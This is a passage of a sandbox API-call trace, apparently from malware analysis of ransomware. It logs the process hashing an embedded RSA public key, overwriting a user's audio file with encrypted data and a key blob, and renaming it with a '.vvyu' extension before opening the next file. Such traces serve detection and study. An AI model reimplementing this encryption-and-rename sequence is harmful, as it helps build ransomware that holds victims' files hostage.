KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.573] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.573] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.573] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.575] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.575] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.575] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.575] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.575] GetLastError () returned 0x0 [0194.575] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.575] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.575] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.575] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.576] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xea50) returned 0x2ea79b0 [0194.576] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f90 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b40 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0fd8 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b28 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.577] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0194.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b58 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2b10 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0194.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0194.581] GetCurrentThreadId () returned 0x66c [0194.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ff50 [0194.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.582] GetCurrentThreadId () returned 0x66c [0194.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b58 [0194.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0194.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bb8 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bd0 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b70 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b10 [0194.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0194.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0194.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0194.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0fd8 | out: hHeap=0x620000) returned 1 [0194.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.595] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xea46, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xea46, lpOverlapped=0x0) returned 1 [0194.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.596] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xea4b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.597] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.598] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.598] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.598] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.598] CloseHandle (hObject=0x568) returned 1 [0194.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0194.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea3a68 [0194.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.603] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\IKpVnLx.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\ikpvnlx.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\IKpVnLx.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\ikpvnlx.m4a.vvyu")) returned 1 [0194.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.604] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.607] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637098e0, ftCreationTime.dwHighDateTime=0x1d8a024, ftLastAccessTime.dwLowDateTime=0xa695d5c0, ftLastAccessTime.dwHighDateTime=0x1d8a486, ftLastWriteTime.dwLowDateTime=0xa695d5c0, ftLastWriteTime.dwHighDateTime=0x1d8a486, nFileSizeHigh=0x0, nFileSizeLow=0x4270, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J6JNV8GX8rXbh.wav", cAlternateFileName="J6JNV8~1.WAV")) returned 1 [0194.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0fd8 [0194.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0fd8 | out: hHeap=0x620000) returned 1 [0194.607] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\J6JNV8GX8rXbh.wav") returned=".wav" [0194.607] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\J6JNV8GX8rXbh.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j6jnv8gx8rxbh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 